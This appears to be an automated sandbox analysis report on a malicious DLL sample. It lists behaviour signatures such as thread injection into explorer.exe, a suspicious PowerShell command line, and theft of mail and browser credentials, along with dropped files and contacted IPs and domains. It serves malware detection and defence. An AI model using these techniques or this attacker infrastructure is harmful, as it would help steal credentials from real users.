  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 331120 Sample: 5fd9d7ec9e7aetar.dll Startdate: 16/12/2020 Architecture: WINDOWS Score: 100 62 8.8.8.8.in-addr.arpa 2->62 64 1.0.0.127.in-addr.arpa 2->64 66 resolver1.opendns.com 2->66 78 Multi AV Scanner detection for domain / URL 2->78 80 Found malware configuration 2->80 82 Multi AV Scanner detection for submitted file 2->82 84 10 other signatures 2->84 9 mshta.exe 19 2->9         started        12 loaddll32.exe 1 2->12         started        14 iexplore.exe 1 55 2->14         started        16 iexplore.exe 1 73 2->16         started        signatures3 process4 signatures5 100 Suspicious powershell command line found 9->100 18 powershell.exe 1 28 9->18         started        102 Writes to foreign memory regions 12->102 104 Modifies the context of a thread in another process (thread injection) 12->104 106 Maps a DLL or memory area into another process 12->106 108 3 other signatures 12->108 22 control.exe 12->22         started        24 iexplore.exe 32 14->24         started        27 iexplore.exe 29 14->27         started        29 iexplore.exe 30 14->29         started        31 iexplore.exe 28 16->31         started        process6 dnsIp7 48 C:\Users\user\AppData\...\lcbc4odh.cmdline, UTF-8 18->48 dropped 50 C:\Users\user\AppData\Local\...\00wddsye.0.cs, UTF-8 18->50 dropped 86 Injects code into the Windows Explorer (explorer.exe) 18->86 88 Writes to foreign memory regions 18->88 90 Modifies the context of a thread in another process (thread injection) 18->90 92 Compiles code for process injection (via .Net compiler) 18->92 33 explorer.exe 18->33 injected 37 csc.exe 18->37         started        40 csc.exe 18->40         started        42 conhost.exe 18->42         started        94 Changes memory attributes in foreign processes to executable or writable 22->94 96 Maps a DLL or memory area into another process 22->96 98 Creates a thread in another existing process (thread injection) 22->98 68 rosadalking.xyz 193.56.255.167, 49740, 49741, 49742 INFOCLOUD-SRLMD Romania 24->68 file8 signatures9 process10 dnsIp11 56 185.156.172.54, 443, 49762, 49764 M247GB Romania 33->56 58 89.44.9.160, 80 M247GB Romania 33->58 60 pagead46.l.doubleclick.net 216.58.210.2, 443, 49761 GOOGLEUS United States 33->60 70 Tries to steal Mail credentials (via file access) 33->70 72 Changes memory attributes in foreign processes to executable or writable 33->72 74 Tries to harvest and steal browser information (history, passwords, etc) 33->74 76 4 other signatures 33->76 52 C:\Users\user\AppData\Local\...\lcbc4odh.dll, PE32 37->52 dropped 44 cvtres.exe 37->44         started        54 C:\Users\user\AppData\Local\...\00wddsye.dll, PE32 40->54 dropped 46 cvtres.exe 40->46         started        file12 signatures13 process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
193.56.255.167
unknown Romania
213137 INFOCLOUD-SRLMD true
89.44.9.160
unknown Romania
9009 M247GB false
216.58.210.2
unknown United States
15169 GOOGLEUS false
185.156.172.54
unknown Romania
9009 M247GB false

Contacted Domains

Name IP Active
rosadalking.xyz 193.56.255.167 true
pagead46.l.doubleclick.net 216.58.210.2 true
resolver1.opendns.com 208.67.222.222 true
1.0.0.127.in-addr.arpa unknown unknown
8.8.8.8.in-addr.arpa unknown unknown